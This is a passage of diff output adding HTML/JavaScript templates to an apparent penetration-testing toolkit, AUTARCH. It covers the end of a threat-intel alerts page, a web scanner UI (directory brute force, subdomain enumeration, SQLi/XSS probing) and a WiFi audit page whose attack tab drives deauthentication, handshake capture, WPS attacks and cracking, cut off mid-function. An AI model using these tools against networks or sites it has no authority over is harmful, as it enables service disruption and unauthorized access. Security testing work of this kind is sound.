var el = document.getElementById('bl-output');
|
||||
if (!el.textContent) return;
|
||||
var blob = new Blob([el.textContent], {type: 'text/plain'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'blocklist_' + document.getElementById('bl-format').value + '.txt';
|
||||
a.click();
|
||||
}
|
||||
|
||||
function alertsRefresh() {
|
||||
fetchJSON('/threat-intel/alerts').then(function(data) {
|
||||
var alerts = data.alerts || [];
|
||||
var container = document.getElementById('alerts-list');
|
||||
if (!alerts.length) {
|
||||
container.innerHTML = '<div class="empty-state">No alerts. Alerts appear when IOCs match network traffic or log data.</div>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
alerts.forEach(function(a) {
|
||||
var sevCls = a.severity === 'critical' ? 'badge-fail' : a.severity === 'high' ? 'badge-high'
|
||||
: a.severity === 'medium' ? 'badge-medium' : 'badge-low';
|
||||
html += '<div class="threat-item">'
|
||||
+ '<span class="badge ' + sevCls + '">' + esc(a.severity) + '</span>'
|
||||
+ '<div><div class="threat-message">' + esc(a.message) + '</div>'
|
||||
+ '<div class="threat-category">' + esc(a.source || '--') + ' — ' + esc(a.timestamp || '') + '</div>'
|
||||
+ '</div></div>';
|
||||
});
|
||||
container.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function alertsClearAll() {
|
||||
if (!confirm('Clear all alerts?')) return;
|
||||
postJSON('/threat-intel/alerts/clear', {}).then(function(data) {
|
||||
alertsRefresh();
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Init ── */
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
iocLoad();
|
||||
feedRefresh();
|
||||
});
|
||||
</script>
|
||||
{% endblock %}
|
||||
241
web/templates/webapp_scanner.html
Normal file
241
web/templates/webapp_scanner.html
Normal file
@ -0,0 +1,241 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}Web Scanner — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Web Application Scanner</h1>
|
||||
<p class="text-muted">Directory brute, subdomain enum, vuln scanning, header analysis</p>
|
||||
</div>
|
||||
|
||||
<div class="tabs">
|
||||
<button class="tab active" onclick="switchTab('quick')">Quick Scan</button>
|
||||
<button class="tab" onclick="switchTab('dirbust')">Dir Brute</button>
|
||||
<button class="tab" onclick="switchTab('subdomain')">Subdomains</button>
|
||||
<button class="tab" onclick="switchTab('vuln')">Vuln Scan</button>
|
||||
<button class="tab" onclick="switchTab('crawl')">Crawl</button>
|
||||
</div>
|
||||
|
||||
<!-- Quick Scan -->
|
||||
<div id="tab-quick" class="tab-content active">
|
||||
<div class="card" style="max-width:900px">
|
||||
<h3>Quick Scan</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="flex:1;margin:0">
|
||||
<input type="text" id="qs-url" class="form-control" placeholder="https://example.com" onkeypress="if(event.key==='Enter')quickScan()">
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="quickScan()">Scan</button>
|
||||
</div>
|
||||
<div id="qs-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Dir Brute -->
|
||||
<div id="tab-dirbust" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:900px">
|
||||
<h3>Directory Bruteforce</h3>
|
||||
<div class="form-group">
|
||||
<label>Target URL</label>
|
||||
<input type="text" id="db-url" class="form-control" placeholder="https://example.com">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Extensions (comma-separated, empty for none)</label>
|
||||
<input type="text" id="db-ext" class="form-control" placeholder=".php,.html,.txt,.bak">
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="startDirbust()">Start</button>
|
||||
<div id="db-status" style="margin-top:0.5rem"></div>
|
||||
<div id="db-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Subdomain -->
|
||||
<div id="tab-subdomain" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:900px">
|
||||
<h3>Subdomain Enumeration</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="flex:1;margin:0">
|
||||
<input type="text" id="sd-domain" class="form-control" placeholder="example.com">
|
||||
</div>
|
||||
<label style="white-space:nowrap;font-size:0.85rem"><input type="checkbox" id="sd-ct" checked> CT Logs</label>
|
||||
<button class="btn btn-primary" onclick="subdomainEnum()">Enumerate</button>
|
||||
</div>
|
||||
<div id="sd-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Vuln Scan -->
|
||||
<div id="tab-vuln" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:900px">
|
||||
<h3>Vulnerability Scanner</h3>
|
||||
<div class="form-group">
|
||||
<label>Target URL (with parameters preferred)</label>
|
||||
<input type="text" id="vs-url" class="form-control" placeholder="https://example.com/search?q=test">
|
||||
</div>
|
||||
<div style="display:flex;gap:1rem;margin:0.5rem 0;font-size:0.85rem">
|
||||
<label><input type="checkbox" id="vs-sqli" checked> SQL Injection</label>
|
||||
<label><input type="checkbox" id="vs-xss" checked> Cross-Site Scripting</label>
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="vulnScan()">Scan</button>
|
||||
<div id="vs-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Crawl -->
|
||||
<div id="tab-crawl" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:900px">
|
||||
<h3>Web Crawler / Spider</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="flex:1;margin:0">
|
||||
<input type="text" id="cr-url" class="form-control" placeholder="https://example.com">
|
||||
</div>
|
||||
<div class="form-group" style="width:100px;margin:0">
|
||||
<input type="number" id="cr-max" class="form-control" value="50" min="1" max="500" title="Max pages">
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="startCrawl()">Crawl</button>
|
||||
</div>
|
||||
<div id="cr-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.hdr-good{color:#22c55e}.hdr-weak{color:#f59e0b}.hdr-missing{color:var(--danger)}
|
||||
.sev-high{color:var(--danger);font-weight:700}.sev-medium{color:#f59e0b;font-weight:600}.sev-low{color:var(--text-muted)}
|
||||
.tech-badge{display:inline-block;padding:2px 8px;border-radius:4px;font-size:0.75rem;margin:2px;background:var(--bg-input);color:var(--accent)}
|
||||
.spinner-inline{display:inline-block;width:14px;height:14px;border:2px solid var(--border);border-top-color:var(--accent);border-radius:50%;animation:spin 0.8s linear infinite;vertical-align:middle;margin-right:6px}
|
||||
@keyframes spin{to{transform:rotate(360deg)}}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let dbPoll=null;
|
||||
|
||||
function switchTab(name){
|
||||
document.querySelectorAll('.tab').forEach((t,i)=>t.classList.toggle('active',
|
||||
['quick','dirbust','subdomain','vuln','crawl'][i]===name));
|
||||
document.querySelectorAll('.tab-content').forEach(c=>c.style.display='none');
|
||||
document.getElementById('tab-'+name).style.display='';
|
||||
}
|
||||
|
||||
function quickScan(){
|
||||
const url=document.getElementById('qs-url').value.trim();
|
||||
if(!url) return;
|
||||
const div=document.getElementById('qs-results');
|
||||
div.innerHTML='<div class="spinner-inline"></div> Scanning...';
|
||||
fetch('/web-scanner/quick',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({url})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
let html=`<div style="display:grid;grid-template-columns:1fr 1fr;gap:1rem">`;
|
||||
// General
|
||||
html+=`<div class="card"><h4>General</h4>
|
||||
<div>Status: <strong>${d.status_code}</strong></div>
|
||||
<div>Server: <strong>${esc(d.server||'hidden')}</strong></div>
|
||||
${d.technologies&&d.technologies.length?'<div style="margin-top:0.5rem">Tech: '+d.technologies.map(t=>`<span class="tech-badge">${t}</span>`).join('')+'</div>':''}
|
||||
${d.redirects&&d.redirects.length?'<div style="margin-top:0.5rem;font-size:0.8rem">Redirects: '+d.redirects.map(r=>r.status+' → '+esc(r.url)).join(' → ')+'</div>':''}
|
||||
</div>`;
|
||||
// Security headers
|
||||
if(d.security_headers){
|
||||
html+=`<div class="card"><h4>Security Headers</h4>`;
|
||||
for(const[h,info] of Object.entries(d.security_headers)){
|
||||
const cls='hdr-'+info.rating;
|
||||
html+=`<div style="font-size:0.8rem;padding:2px 0"><span class="${cls}">${info.present?'✓':'✗'}</span> ${h}${info.value?' <span style="color:var(--text-muted)">'+esc(info.value).slice(0,60)+'</span>':''}</div>`;
|
||||
}
|
||||
html+=`</div>`;
|
||||
}
|
||||
html+=`</div>`;
|
||||
// SSL
|
||||
if(d.ssl&&Object.keys(d.ssl).length>1){
|
||||
html+=`<div class="card" style="margin-top:1rem"><h4>SSL/TLS</h4>
|
||||
<div>Valid: <strong class="${d.ssl.valid?'hdr-good':'hdr-missing'}">${d.ssl.valid?'Yes':'No'}</strong></div>
|
||||
<div>Protocol: ${esc(d.ssl.protocol||'?')}</div>
|
||||
<div>Cipher: ${esc(d.ssl.cipher||'?')}</div>
|
||||
${d.ssl.expires?'<div>Expires: '+esc(d.ssl.expires)+'</div>':''}
|
||||
${(d.ssl.issues||[]).map(i=>'<div class="hdr-missing">[!] '+esc(i)+'</div>').join('')}
|
||||
</div>`;
|
||||
}
|
||||
div.innerHTML=html;
|
||||
}).catch(e=>{div.innerHTML='Error: '+e.message});
|
||||
}
|
||||
|
||||
function startDirbust(){
|
||||
const url=document.getElementById('db-url').value.trim();
|
||||
if(!url) return;
|
||||
const ext=document.getElementById('db-ext').value.split(',').map(e=>e.trim()).filter(Boolean);
|
||||
document.getElementById('db-status').innerHTML='<div class="spinner-inline"></div> Bruteforcing...';
|
||||
document.getElementById('db-results').innerHTML='';
|
||||
fetch('/web-scanner/dirbust',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({url,extensions:ext})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){document.getElementById('db-status').innerHTML='Error: '+esc(d.error);return}
|
||||
if(dbPoll) clearInterval(dbPoll);
|
||||
dbPoll=setInterval(()=>{
|
||||
fetch('/web-scanner/dirbust/'+d.job_id).then(r=>r.json()).then(s=>{
|
||||
document.getElementById('db-status').innerHTML=s.done?
|
||||
`Done. Found ${s.found.length} paths (tested ${s.tested}/${s.total})`:
|
||||
`<div class="spinner-inline"></div> ${s.tested}/${s.total} tested, ${s.found.length} found`;
|
||||
if(s.found.length){
|
||||
document.getElementById('db-results').innerHTML='<table class="data-table"><thead><tr><th>Status</th><th>Path</th><th>Size</th><th>Type</th></tr></thead><tbody>'+
|
||||
s.found.map(f=>`<tr><td>${f.status}</td><td><a href="${esc(url+f.path)}" target="_blank">${esc(f.path)}</a></td><td>${f.size}</td><td style="font-size:0.75rem">${esc(f.content_type)}</td></tr>`).join('')+
|
||||
'</tbody></table>';
|
||||
}
|
||||
if(s.done){clearInterval(dbPoll);dbPoll=null}
|
||||
});
|
||||
},2000);
|
||||
});
|
||||
}
|
||||
|
||||
function subdomainEnum(){
|
||||
const domain=document.getElementById('sd-domain').value.trim();
|
||||
if(!domain) return;
|
||||
const div=document.getElementById('sd-results');
|
||||
div.innerHTML='<div class="spinner-inline"></div> Enumerating...';
|
||||
fetch('/web-scanner/subdomain',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({domain,use_ct:document.getElementById('sd-ct').checked})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
const subs=d.subdomains||[];
|
||||
div.innerHTML=`<div style="margin-bottom:0.5rem"><strong>${subs.length}</strong> subdomains found for <strong>${esc(d.domain)}</strong></div>`+
|
||||
(subs.length?'<div style="column-count:3;font-size:0.85rem;font-family:monospace">'+subs.map(s=>`<div>${esc(s)}</div>`).join('')+'</div>':'');
|
||||
});
|
||||
}
|
||||
|
||||
function vulnScan(){
|
||||
const url=document.getElementById('vs-url').value.trim();
|
||||
if(!url) return;
|
||||
const div=document.getElementById('vs-results');
|
||||
div.innerHTML='<div class="spinner-inline"></div> Scanning for vulnerabilities...';
|
||||
fetch('/web-scanner/vuln',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({url,sqli:document.getElementById('vs-sqli').checked,xss:document.getElementById('vs-xss').checked})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
const findings=d.findings||[];
|
||||
if(!findings.length){div.innerHTML=`<div style="color:#22c55e">No vulnerabilities found. Tested ${d.urls_tested||0} URL(s).</div>`;return}
|
||||
div.innerHTML=`<div style="margin-bottom:0.5rem"><strong class="sev-high">${findings.length} finding(s)</strong></div>
|
||||
<table class="data-table"><thead><tr><th>Severity</th><th>Type</th><th>Parameter</th><th>Description</th><th>Payload</th></tr></thead><tbody>`+
|
||||
findings.map(f=>`<tr><td class="sev-${f.severity}">${f.severity.toUpperCase()}</td>
|
||||
<td>${f.type.toUpperCase()}</td><td>${esc(f.parameter||'')}</td>
|
||||
<td style="font-size:0.8rem">${esc(f.description)}</td>
|
||||
<td style="font-family:monospace;font-size:0.75rem">${esc(f.payload||'')}</td></tr>`).join('')+
|
||||
'</tbody></table>';
|
||||
});
|
||||
}
|
||||
|
||||
function startCrawl(){
|
||||
const url=document.getElementById('cr-url').value.trim();
|
||||
if(!url) return;
|
||||
const max=+document.getElementById('cr-max').value||50;
|
||||
const div=document.getElementById('cr-results');
|
||||
div.innerHTML='<div class="spinner-inline"></div> Crawling...';
|
||||
fetch('/web-scanner/crawl',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({url,max_pages:max})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
const pages=d.pages||[];
|
||||
div.innerHTML=`<div style="margin-bottom:0.5rem"><strong>${pages.length}</strong> pages crawled</div>
|
||||
<table class="data-table"><thead><tr><th>Status</th><th>URL</th><th>Title</th><th>Size</th><th>Forms</th></tr></thead><tbody>`+
|
||||
pages.map(p=>`<tr><td>${p.status}</td><td style="max-width:400px;overflow:hidden;text-overflow:ellipsis">
|
||||
<a href="${esc(p.url)}" target="_blank" style="font-size:0.8rem">${esc(p.url)}</a></td>
|
||||
<td style="font-size:0.8rem">${esc(p.title||'')}</td><td>${p.size}</td><td>${p.forms}</td></tr>`).join('')+
|
||||
'</tbody></table>';
|
||||
});
|
||||
}
|
||||
|
||||
function esc(s){return s?String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"'):''}
|
||||
</script>
|
||||
{% endblock %}
|
||||
453
web/templates/wifi_audit.html
Normal file
453
web/templates/wifi_audit.html
Normal file
@ -0,0 +1,453 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — WiFi Audit{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>WiFi Auditing</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Wireless network scanning, attack tools, and monitoring.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="wifi" data-tab="scan" onclick="showTab('wifi','scan')">Scan</button>
|
||||
<button class="tab" data-tab-group="wifi" data-tab="attack" onclick="showTab('wifi','attack')">Attack</button>
|
||||
<button class="tab" data-tab-group="wifi" data-tab="monitor" onclick="showTab('wifi','monitor')">Monitor</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== SCAN TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="wifi" data-tab="scan">
|
||||
|
||||
<div class="section">
|
||||
<h2>Wireless Interfaces</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="wifiRefreshIfaces()">Refresh</button>
|
||||
<button class="btn btn-primary btn-small" onclick="wifiMonitorMode(true)">Enable Monitor Mode</button>
|
||||
<button class="btn btn-danger btn-small" onclick="wifiMonitorMode(false)">Disable Monitor Mode</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Interface</th><th>Mode</th><th>Driver</th><th>Chipset</th><th>Status</th></tr></thead>
|
||||
<tbody id="wifi-iface-list">
|
||||
<tr><td colspan="5" class="empty-state">Click Refresh to list wireless interfaces.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
<div class="form-group" style="max-width:300px;margin-top:12px">
|
||||
<label>Selected Interface</label>
|
||||
<select id="wifi-iface-select">
|
||||
<option value="">-- refresh to populate --</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Network Scan</h2>
|
||||
<div class="input-row">
|
||||
<input type="number" id="wifi-scan-duration" placeholder="Duration (seconds)" value="15" min="5" max="120" style="max-width:200px">
|
||||
<button id="btn-wifi-scan" class="btn btn-primary" onclick="wifiScanNetworks()">Scan Networks</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>BSSID</th><th>SSID</th><th>Channel</th>
|
||||
<th>Encryption</th><th>Signal</th><th>Clients</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="wifi-scan-results">
|
||||
<tr><td colspan="6" class="empty-state">No scan results yet.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== ATTACK TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="wifi" data-tab="attack">
|
||||
|
||||
<div class="section">
|
||||
<h2>Deauthentication Attack</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Send deauthentication frames to disconnect clients from an access point.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Target BSSID</label>
|
||||
<input type="text" id="deauth-bssid" placeholder="AA:BB:CC:DD:EE:FF">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Client MAC (optional, blank = broadcast)</label>
|
||||
<input type="text" id="deauth-client" placeholder="AA:BB:CC:DD:EE:FF">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:120px">
|
||||
<label>Count</label>
|
||||
<input type="number" id="deauth-count" value="10" min="1" max="9999">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-deauth" class="btn btn-danger" onclick="wifiDeauth()">Send Deauth</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="deauth-output"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Handshake Capture</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Capture WPA/WPA2 four-way handshake from a target network.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Target BSSID</label>
|
||||
<input type="text" id="hs-bssid" placeholder="AA:BB:CC:DD:EE:FF">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:120px">
|
||||
<label>Channel</label>
|
||||
<input type="number" id="hs-channel" placeholder="6" min="1" max="196">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-hs-capture" class="btn btn-primary" onclick="wifiCaptureHandshake()">Capture Handshake</button>
|
||||
<button class="btn btn-small" onclick="wifiStopCapture()">Stop Capture</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="hs-output"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>WPS Attack</h2>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-wps-scan" class="btn btn-small" onclick="wifiWpsScan()">Scan WPS Networks</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>BSSID</th><th>SSID</th><th>WPS Version</th><th>Locked</th><th>Action</th></tr></thead>
|
||||
<tbody id="wps-scan-results">
|
||||
<tr><td colspan="5" class="empty-state">Click Scan to find WPS-enabled networks.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
<pre class="output-panel" id="wps-output" style="margin-top:12px"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Crack Handshake</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Capture File Path</label>
|
||||
<input type="text" id="crack-file" placeholder="/path/to/capture.cap">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Wordlist Path</label>
|
||||
<input type="text" id="crack-wordlist" placeholder="/path/to/wordlist.txt">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-crack" class="btn btn-primary" onclick="wifiCrackHandshake()">Crack</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="crack-output"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== MONITOR TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="wifi" data-tab="monitor">
|
||||
|
||||
<div class="section">
|
||||
<h2>Rogue AP Detection</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Save a baseline of known APs, then detect rogue or evil-twin access points.
|
||||
</p>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-baseline" class="btn btn-primary btn-small" onclick="wifiSaveBaseline()">Save Baseline</button>
|
||||
<button id="btn-detect-rogue" class="btn btn-danger btn-small" onclick="wifiDetectRogue()">Detect Rogue APs</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="rogue-output"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Packet Capture</h2>
|
||||
<div class="input-row">
|
||||
<select id="cap-filter" style="max-width:200px">
|
||||
<option value="">No Filter</option>
|
||||
<option value="beacon">Beacons</option>
|
||||
<option value="probe">Probes</option>
|
||||
<option value="deauth">Deauth Frames</option>
|
||||
<option value="data">Data Frames</option>
|
||||
<option value="eapol">EAPOL (Handshakes)</option>
|
||||
</select>
|
||||
<button id="btn-cap-start" class="btn btn-primary btn-small" onclick="wifiStartCapture()">Start Capture</button>
|
||||
<button class="btn btn-danger btn-small" onclick="wifiStopPacketCapture()">Stop Capture</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="cap-live-output" style="max-height:300px"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Saved Captures</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="wifiListCaptures()">Refresh List</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Filename</th><th>Size</th><th>Date</th><th>Actions</th></tr></thead>
|
||||
<tbody id="captures-list">
|
||||
<tr><td colspan="4" class="empty-state">Click Refresh to list saved capture files.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
/* ── WiFi Audit ── */
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
function wifiRefreshIfaces() {
|
||||
fetchJSON('/wifi/interfaces').then(function(data) {
|
||||
if (data.error) { renderOutput('wifi-iface-list', data.error); return; }
|
||||
var ifaces = data.interfaces || [];
|
||||
var sel = document.getElementById('wifi-iface-select');
|
||||
sel.innerHTML = '';
|
||||
if (!ifaces.length) {
|
||||
document.getElementById('wifi-iface-list').innerHTML =
|
||||
'<tr><td colspan="5" class="empty-state">No wireless interfaces found.</td></tr>';
|
||||
sel.innerHTML = '<option value="">No interfaces</option>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
ifaces.forEach(function(ifc) {
|
||||
html += '<tr><td>' + esc(ifc.name) + '</td><td>' + esc(ifc.mode || 'managed') + '</td>'
|
||||
+ '<td>' + esc(ifc.driver || '--') + '</td><td>' + esc(ifc.chipset || '--') + '</td>'
|
||||
+ '<td><span class="badge ' + (ifc.up ? 'badge-pass' : 'badge-fail') + '">'
|
||||
+ (ifc.up ? 'UP' : 'DOWN') + '</span></td></tr>';
|
||||
var opt = document.createElement('option');
|
||||
opt.value = ifc.name;
|
||||
opt.textContent = ifc.name + ' (' + (ifc.mode || 'managed') + ')';
|
||||
sel.appendChild(opt);
|
||||
});
|
||||
document.getElementById('wifi-iface-list').innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function wifiGetIface() {
|
||||
var sel = document.getElementById('wifi-iface-select');
|
||||
return sel ? sel.value : '';
|
||||
}
|
||||
|
||||
function wifiMonitorMode(enable) {
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
postJSON('/wifi/monitor-mode', {interface: iface, enable: enable}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
alert(data.message || (enable ? 'Monitor mode enabled' : 'Monitor mode disabled'));
|
||||
wifiRefreshIfaces();
|
||||
});
|
||||
}
|
||||
|
||||
function wifiScanNetworks() {
|
||||
var btn = document.getElementById('btn-wifi-scan');
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var duration = parseInt(document.getElementById('wifi-scan-duration').value) || 15;
|
||||
setLoading(btn, true);
|
||||
postJSON('/wifi/scan', {interface: iface, duration: duration}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('wifi-scan-results').innerHTML =
|
||||
'<tr><td colspan="6" class="empty-state">Error: ' + esc(data.error) + '</td></tr>';
|
||||
return;
|
||||
}
|
||||
var nets = data.networks || [];
|
||||
if (!nets.length) {
|
||||
document.getElementById('wifi-scan-results').innerHTML =
|
||||
'<tr><td colspan="6" class="empty-state">No networks found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
nets.forEach(function(n) {
|
||||
var sigClass = n.signal > -50 ? 'badge-pass' : n.signal > -70 ? 'badge-medium' : 'badge-fail';
|
||||
html += '<tr><td><code>' + esc(n.bssid) + '</code></td>'
|
||||
+ '<td>' + esc(n.ssid || '<hidden>') + '</td>'
|
||||
+ '<td>' + esc(n.channel) + '</td>'
|
||||
+ '<td>' + esc(n.encryption || 'Open') + '</td>'
|
||||
+ '<td><span class="badge ' + sigClass + '">' + esc(n.signal) + ' dBm</span></td>'
|
||||
+ '<td>' + esc(n.clients || 0) + '</td></tr>';
|
||||
});
|
||||
document.getElementById('wifi-scan-results').innerHTML = html;
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiDeauth() {
|
||||
var bssid = document.getElementById('deauth-bssid').value.trim();
|
||||
if (!bssid) { alert('Enter a target BSSID.'); return; }
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var btn = document.getElementById('btn-deauth');
|
||||
setLoading(btn, true);
|
||||
postJSON('/wifi/deauth', {
|
||||
interface: iface,
|
||||
bssid: bssid,
|
||||
client: document.getElementById('deauth-client').value.trim(),
|
||||
count: parseInt(document.getElementById('deauth-count').value) || 10
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('deauth-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiCaptureHandshake() {
|
||||
var bssid = document.getElementById('hs-bssid').value.trim();
|
||||
if (!bssid) { alert('Enter a target BSSID.'); return; }
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var btn = document.getElementById('btn-hs-capture');
|
||||
setLoading(btn, true);
|
||||
postJSON('/wifi/capture-handshake', {
|
||||
interface: iface,
|
||||
bssid: bssid,
|
||||
channel: parseInt(document.getElementById('hs-channel').value) || 0
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('hs-output', data.message || data.error || 'Capture started');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiStopCapture() {
|
||||
postJSON('/wifi/stop-capture', {}).then(function(data) {
|
||||
renderOutput('hs-output', data.message || data.error || 'Stopped');
|
||||
});
|
||||
}
|
||||
|
||||
function wifiWpsScan() {
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var btn = document.getElementById('btn-wps-scan');
|
||||
setLoading(btn, true);
|
||||
postJSON('/wifi/wps-scan', {interface: iface}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('wps-scan-results').innerHTML =
|
||||
'<tr><td colspan="5" class="empty-state">Error: ' + esc(data.error) + '</td></tr>';
|
||||
return;
|
||||
}
|
||||
var nets = data.networks || [];
|
||||
if (!nets.length) {
|
||||
document.getElementById('wps-scan-results').innerHTML =
|
||||
'<tr><td colspan="5" class="empty-state">No WPS networks found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
nets.forEach(function(n) {
|
||||
html += '<tr><td><code>' + esc(n.bssid) + '</code></td>'
|
||||
+ '<td>' + esc(n.ssid || '<hidden>') + '</td>'
|
||||
+ '<td>' + esc(n.wps_version || '--') + '</td>'
|
||||
+ '<td><span class="badge ' + (n.locked ? 'badge-fail' : 'badge-pass') + '">'
|
||||
+ (n.locked ? 'Yes' : 'No') + '</span></td>'
|
||||
+ '<td><button class="btn btn-danger btn-small" onclick="wifiWpsAttack(\''
|
||||
+ esc(n.bssid) + '\')">Attack</button></td></tr>';
|
||||
});
|
||||
